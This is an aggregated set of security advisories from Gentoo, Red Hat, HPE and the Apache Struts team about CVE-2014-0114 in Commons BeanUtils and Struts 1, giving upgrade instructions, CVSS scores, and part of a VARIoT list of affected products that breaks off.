Severity: Normal Title: Commons-BeanUtils: Arbitrary code execution Date: July 20, 2016 Bugs: #534498 ID: 201607-09
Synopsis
Apache Commons BeanUtils does not properly suppress the class property, which could lead to the remote execution of arbitrary code.
Workaround
There is no known workaround at this time.
Resolution
All Commons BeanUtils users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot -v ">=dev-java/commons-beanutils-1.9.2"
References
[ 1 ] CVE-2014-0114 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0114
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201607-09
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Important: Red Hat A-MQ Broker 7.5 release and security update Advisory ID: RHSA-2019:2995-01 Product: Red Hat JBoss AMQ Advisory URL: https://access.redhat.com/errata/RHSA-2019:2995 Issue date: 2019-10-10 Keywords: amq,messaging,integration,broker Cross references: RHEA-2019:45713-01 CVE Names: CVE-2014-0114 ==================================================================== 1. Summary:
Red Hat A-MQ Broker 7.5 is now available from the Red Hat Customer Portal.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Description:
AMQ Broker is a high-performance messaging implementation based on ActiveMQ Artemis. It uses an asynchronous journal for fast message persistence, and supports multiple languages, protocols, and platforms.
This release of Red Hat A-MQ Broker 7.5.0 serves as a replacement for Red Hat A-MQ Broker 7.4.1, and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.
Security Fix(es):
- Apache Struts 1: Class Loader manipulation via request parameters (CVE-2014-0114)
For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.
- Solution:
Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.
The References section of this erratum contains a download link (you must log in to download the update).
- Bugs fixed (https://bugzilla.redhat.com/):
1091938 - CVE-2014-0114 Apache Struts 1: Class Loader manipulation via request parameters
- JIRA issues fixed (https://issues.jboss.org/):
ENTMQBR-2849 - CVE-2014-0114 Apache Struts 1: Class Loader manipulation via request parameters [amq-7.4.0]
- References:
https://access.redhat.com/security/cve/CVE-2014-0114 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=jboss.amq.broker&version=7.5.0 https://access.redhat.com/documentation/en-us/red_hat_amq/7.5/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2019 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBXZ7b4tzjgjWX9erEAQhy1BAAlZY3SIVWWf78mbhIhS4x+DCzq6s6W+B7 gh7bSOfLCqLNVyuqI99PH920CgZwtrN01VVt2by822MdIKKKHtbjFTzstm1ucLso QlYBLkmPzkC0xGPP4q67EDhr5KctJ4wlkerTnBhfwJxvFBLZnWzgGvmawbf3X7iQ qWwigzfVjiUwen7pv5Bol4WkzhTbvUxPEVDS696ziJI0zPyqnnDXpl+9lnXcYL0m GLsD59I984+gLxpl9fzgOPZxm2U1gGusO5rM9vUPmGX06XJo1nsUKUuhRfLoNwQm YcK6yVFE+TAOAKbmM2o62hnA/+UemV/bBQJh3ymVgjcHSz8UYae4vfmiPfiyBsVv STakDzO5yz+htMLJWVAnHjLEgbcGgzrH7jqXLzNO47bZR0oVVP6RjZnsZCdhxeT7 mPZtwWSVHFl8GRriGvEKQjC27Majwva5Hnwh82IPr5lgbLpWmvQSBzDHIObdyPts UYk+zBhZHNXzdQrnEA2BzhsXehZiMigKefutBPPEc+iXjFsLSTmGYceECyhUP/No RuQTYanb0GdgPDpgCOoDIgPtY3VyMiCur8BkQKGIyJt4aXdSaBoqAXt4KypAFExG lRVXHA8RRVcnqsxcpCA+VesIbPuTzmCSsgkQckv/TGLFgdAMLOA4J38bUCjulvMm 9D+Pu+r8KbU=kdcn -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05324755
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c05324755 Version: 1
HPSBGN03669 rev.1 - HPE SiteScope, Local Elevation of Privilege, Remote Denial of Service, Arbitrary Code Execution and Cross-Site Request Forgery
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2016-11-04 Last Updated: 2016-11-04
Potential Security Impact: Local: Elevation of Privilege; Remote: Arbitrary Code Execution, Cross-Site Request Forgery (CSRF), Denial of Service (DoS)
Source: Hewlett Packard Enterprise, Product Security Response Team
VULNERABILITY SUMMARY Potential vulnerabilities have been identified in HPE SiteScope. The vulnerabilities could be exploited to allow local elevation of privilege and exploited remotely to allow denial of service, arbitrary code execution, cross-site request forgery.
References:
- CVE-2014-0114 - Apache Struts, execution of arbitrary code
- CVE-2016-0763 - Apache Tomcat, denial of service (DoS)
- CVE-2014-0107 - Apache XML Xalan, bypass expected restrictions
- CVE-2015-3253 - Apache Groovy, execution of arbitrary code
- CVE-2015-5652 - Python, elevation of privilege
- CVE-2013-6429 - Spring Framework, cross-site request forgery
- CVE-2014-0050 - Apache Commons FileUpload, denial of service (DoS)
- PSRT110264
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
- HP SiteScope Monitors Software Series 11.2xa11.32IP1
BACKGROUND
CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector
CVE-2013-6429
6.5 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L
6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CVE-2014-0050
8.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2014-0107
8.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2014-0114
6.8 CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2015-3253
7.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2015-5652
8.6 CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)
CVE-2016-0763
6.3 CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499
RESOLUTION
HPE has provided a resolution via an update to HPE SiteScope. Details on the update and each vulnerability are in the KM articles below.
Note: The resolution for each vulnerability listed is to upgrade to SiteScope 11.32IP2 or an even more recent version of SiteScope if available. The SiteScope update can be can found in the personal zone in "my updates" in HPE Software Support Online: https://softwaresupport.hpe.com.
-
Apache Commons FileUpload: KM02550251 (CVE-2014-0050):
-
Apache Struts: KM02553983 (CVE-2014-0114):
-
Apache Tomcat: KM02553990 (CVE-2016-0763):
-
Apache XML Xalan: KM02553991 (CVE-2014-0107):
-
Apache Groovy: KM02553992 (CVE-2015-3253):
-
Python: KM02553997 (CVE-2015-5652):
-
Spring Framework: KM02553998 (CVE-2013-6429):
HISTORY Version:1 (rev.1) - 4 November 2016 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.
Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
Thanks to the efforts of Alvaro Munoz and the HP Fortify team, the Apache Struts project team can recommend a first mitigation that is relatively simple to apply. It involves the introduction of a generic Servlet filter, adding the possibility to blacklist unacceptable request parameters based on regular expressions. Please see the corresponding HP Fortify blog entry [2] for detailed instructions. Based on this information, the Apache Struts project team recommends to apply the mitigation advice immediately for all Struts 1 based applications.
Struts 1 has had its End-Of-Life announcement more than one year ago [3]. However, in a cross project effort the Struts team is looking for a correction or an improved mitigation path. Please stay tuned for further information regarding a solution.
This is a cross-list posting. If you have questions regarding this report, please direct them to security@struts.apache.org only.
[1] http://struts.apache.org/release/2.3.x/docs/s2-021.html [2] http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-applications/ba-p/6463188#.U2J7xeaSxro [3] http://struts.apache.org/struts1eol-announcement.html
-- Ren\xe9 Gielen http://twitter.com/rgielen
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-201404-0288", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "struts", scope: "eq", trust: 1.9, vendor: "apache", version: "1.2.4", }, { model: "struts", scope: "eq", trust: 1.9, vendor: "apache", version: "1.2.7", }, { model: "struts", scope: "eq", trust: 1.9, vendor: "apache", version: "1.2.6", }, { model: "struts", scope: "eq", trust: 1.9, vendor: "apache", version: "1.3.10", }, { model: "struts", scope: "eq", trust: 1.9, vendor: "apache", version: "1.2.2", }, { model: "struts", scope: "eq", trust: 1.9, vendor: "apache", version: "1.1", }, { model: "struts", scope: "eq", trust: 1.9, vendor: "apache", version: "1.3.5", }, { model: "struts", scope: "eq", trust: 1.9, vendor: "apache", version: "1.2.8", }, { model: "struts", scope: "eq", trust: 1.9, vendor: "apache", version: "1.3.8", }, { model: "struts", scope: "eq", trust: 1.9, vendor: "apache", version: "1.2.9", }, { model: "jp1/performance management web console", scope: "eq", trust: 1.8, vendor: "hitachi", version: "-09-00-00", }, { model: "jp1/performance management web console", scope: "eq", trust: 1.5, vendor: "hitachi", version: "-09-50-03", }, { model: "jp1/performance management web console", scope: "eq", trust: 1.5, vendor: "hitachi", version: "-09-50-00", }, { model: "jp1/performance management web console", scope: "eq", trust: 1.5, vendor: "hitachi", version: "-09-10-10", }, { model: "jp1/performance management web console", scope: "eq", trust: 1.5, vendor: "hitachi", version: "-09-00-12", }, { model: "jp1/performance management web console", scope: "eq", trust: 1.5, vendor: "hitachi", version: "-08-50-13", }, { model: "jp1/performance management web console", scope: "eq", trust: 1.5, vendor: "hitachi", version: "-08-50-00", }, { model: "jp1/performance management web console", scope: "eq", trust: 1.5, vendor: "hitachi", version: "-10-00-03", }, { model: "jp1/performance management web console", scope: "eq", trust: 1.5, vendor: "hitachi", version: "-10-00-00", }, { model: "jp1/performance management web console", scope: "eq", trust: 1.5, vendor: "hitachi", version: "-09-10-00", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "1.0.2", }, { model: "tiered storage manager software -00 )", scope: "eq", trust: 1.2, vendor: "hitachi", version: "7.1.1", }, { model: "tiered storage manager software )", scope: "eq", trust: 1.2, vendor: "hitachi", version: "7.3-00", }, { model: "commons beanutils", scope: "lte", trust: 1, vendor: "apache", version: "1.9.1", }, { model: "struts", scope: "eq", trust: 1, vendor: "apache", version: "1.0", }, { model: "device manager software -00 )", scope: "eq", trust: 0.9, vendor: "hitachi", version: "7.3", }, { model: "device manager software )", scope: "eq", trust: 0.9, vendor: "hitachi", version: "7.4-00", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.9, vendor: "hitachi", version: "-08-11-00", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.9, vendor: "hitachi", version: "-08-00-00", }, { model: "device manager software )", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.1-00", }, { model: "device manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.1.1-03", }, { model: "device manager software )", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.2-00", }, { model: "tiered storage manager software )", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.1-00", }, { model: "tiered storage manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.1.1-00", }, { model: "device manager software )", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.2-01", }, { model: "device manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.2-01", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.6, vendor: "hitachi", version: "-08-11-08", }, { model: "device manager software )", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.1.1-00", }, { model: "device manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.2-00", }, { model: "tiered storage manager software )", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.1.1-00", }, { model: "jp1/performance management manager web option", scope: "eq", trust: 0.6, vendor: "hitachi", version: "-07-00", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.6, vendor: "hitachi", version: "-08-00-12", }, { model: "tiered storage manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.1-00", }, { model: "tiered storage manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.2-00", }, { model: "device manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.1-03", }, { model: "tiered storage manager software )", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.1-01", }, { model: "device manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.1-00", }, { model: "tuning manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "7.6.1-05", }, { model: "device manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.1-02", }, { model: "device manager software )", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.1.1-04", }, { model: "infosphere information server", scope: "eq", trust: 0.6, vendor: "ibm", version: "9.1", }, { model: "tiered storage manager software )", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.1.1-01", }, { model: "tuning manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "7.4.0-02", }, { model: "device manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.1.1-00", }, { model: "tuning manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "7.4.0-01", }, { model: "infosphere information server", scope: "eq", trust: 0.6, vendor: "ibm", version: "8.5", }, { model: "device manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.0-06", }, { model: "device manager software )", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.2-02", }, { model: "device manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.2-02", }, { model: "device manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.0-00", }, { model: "tuning manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "8.0.0-03", }, { model: "tiered storage manager software )", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.2-00", }, { model: "tiered storage manager software )", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.2-01", }, { model: "tiered storage manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.2-01", }, { model: "tuning manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "8.0.0-04", }, { model: "device manager software )", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.1-02", }, { model: "device manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.1.1-04", }, { model: "device manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "7.0.0-00", }, { model: "jp1/performance management manager web option", scope: "eq", trust: 0.6, vendor: "hitachi", version: "-07-54", }, { model: "infosphere information server", scope: "eq", trust: 0.6, vendor: "ibm", version: "8.1", }, { model: "infosphere information server", scope: "eq", trust: 0.6, vendor: "ibm", version: "8.7", }, { model: "tiered storage manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.1-01", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.6, vendor: "hitachi", version: "-08-10-08", }, { model: "tiered storage manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.1.1-01", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.6, vendor: "hitachi", version: "-08-10-00", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0.0.17", }, { model: "openpages", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.0", }, { model: "device manager software (linux(suse", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-05", }, { model: "retail allocation", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.1", }, { model: "distributed marketing", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.3.0", }, { model: "device manager software (solaris(sp", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.4.0-07", }, { model: "global link manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.6-00", }, { model: "security qradar", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0", }, { model: "tivoli storage manager administration center", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.3", }, { model: "tivoli workload scheduler z/os connector", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "records manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "retail clearance optimization engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0", }, { model: "tuning manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.401", }, { model: "tuning manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.0.0-00", }, { model: "big-ip aam", scope: "eq", trust: 0.3, vendor: "f5", version: "11.5", }, { model: "social media analytics", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.3", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-09-00", }, { model: "terasoluna server framework for java", scope: "ne", trust: 0.3, vendor: "ntt data", version: "2.0.5.2", }, { model: "global link manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.2-00", }, { model: "device manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.0.1-02", }, { model: "big-ip webaccelerator hf7", scope: "eq", trust: 0.3, vendor: "f5", version: "11.1.0", }, { model: "lotus expeditor", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.2", }, { model: "vcenter server", scope: "eq", trust: 0.3, vendor: "vmware", version: "5.1", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.1", }, { model: "business process manager standard", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5", }, { model: "tivoli application dependency discovery manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.1.2", }, { model: "device manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.0.0-00", }, { model: "device manager software (solaris(x6", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-05", }, { model: "device manager software (solaris", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.0-06(x64))", }, { model: "tuning manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "3.5.0", }, { model: "device manager software (linux(suse", scope: "ne", trust: 0.3, vendor: "hitachi", version: "8.0.0-06", }, { model: "fuse esb enterprise", scope: "eq", trust: 0.3, vendor: "redhat", version: "7.1.0", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0.43", }, { model: "ds8870", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0", }, { model: "tiered storage manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-05", }, { model: "connections", scope: "eq", trust: 0.3, vendor: "ibm", version: "4.0", }, { model: "retail invoice matching", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "knowledge", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.6.0", }, { model: "tiered storage manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-05", }, { model: "rational reporting for development intelligence", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.0.2", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0.0.13", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.1", }, { model: "tiered storage manager software (linux(suse", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-00", }, { model: "tivoli endpoint manager for remote control", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "content analytics with enterprise search", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.2", }, { model: "business process manager advanced", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5.0", }, { model: "xp p9000 tiered storage manager", scope: "eq", trust: 0.3, vendor: "hp", version: "1.1.0-00", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.1.0.47", }, { model: "websphere portal", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.1", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.1", }, { model: "connections", scope: "eq", trust: 0.3, vendor: "ibm", version: "4.5", }, { model: "tivoli dynamic workload console", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.6.0.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "linux sparc", scope: "eq", trust: 0.3, vendor: "debian", version: "6.0", }, { model: "linux enterprise software development kit sp3", scope: "eq", trust: 0.3, vendor: "suse", version: "11", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.1.0", }, { model: "big-ip edge gateway hf5", scope: "eq", trust: 0.3, vendor: "f5", version: "11.2.1", }, { model: "rational insight", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.1.1", }, { model: "campaign", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.1", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0", }, { model: "secure analytics 2013.2r8", scope: "ne", trust: 0.3, vendor: "juniper", version: null, }, { model: "tivoli endpoint manager for remote control", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.2", }, { model: "tivoli storage productivity center", scope: "eq", trust: 0.3, vendor: "ibm", version: "5.1", }, { model: "job management partner 1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-0", }, { model: "device manager software (linux(sles", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.0.0-00", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0.41", }, { model: "content manager records enabler", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "device manager software )", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.0-06", }, { model: "tivoli integrated portal", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.1.1.19", }, { model: "openpages grc platform", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.2.1", }, { model: "content navigator", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.0.1", }, { model: "device manager software )", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.3-00", }, { model: "primavera contract management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "tuning manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-00", }, { model: "websphere portal", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0", }, { model: "openpages", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0", }, { model: "big-ip edge gateway", scope: "eq", trust: 0.3, vendor: "f5", version: "11.2", }, { model: "business process manager standard", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0.x", }, { model: "device manager software (solaris", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.1.1-04(x64))", }, { model: "business server", scope: "eq", trust: 0.3, vendor: "mandriva", version: "1", }, { model: "tivoli endpoint manager for remote control", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.2.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.1.0.43", }, { model: "device manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-05", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.10", }, { model: "jboss operations network", scope: "eq", trust: 0.3, vendor: "redhat", version: "3.2.1", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.3", }, { model: "device manager", scope: "eq", trust: 0.3, vendor: "hp", version: "1.0.0-00", }, { model: "content navigator", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.0", }, { model: "device manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-05", }, { model: "xp7 global link manager software", scope: "eq", trust: 0.3, vendor: "hp", version: "6.4.0-00", }, { model: "raplication manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-05", }, { model: "xp p9000 tiered storage manager", scope: "eq", trust: 0.3, vendor: "hp", version: "8.0.0-00", }, { model: "websphere partner gateway advanced edition", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.2", }, { model: "weblogic portal", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0.42", }, { model: "connections", scope: "eq", trust: 0.3, vendor: "ibm", version: "3.0", }, { model: "global link manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.5-00", }, { model: "tiered storage manager software", scope: "ne", trust: 0.3, vendor: "hitachi", version: "8.0.0-06", }, { model: "device manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.5.0-02", }, { model: "big-ip webaccelerator hf1", scope: "eq", trust: 0.3, vendor: "f5", version: "10.2.1", }, { model: "sitescope", scope: "eq", trust: 0.3, vendor: "hp", version: "11.20", }, { model: "primavera contract management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "xp p9000 tiered storage manager", scope: "eq", trust: 0.3, vendor: "hp", version: "8.0.0-06", }, { model: "big-ip webaccelerator", scope: "eq", trust: 0.3, vendor: "f5", version: "10.0", }, { 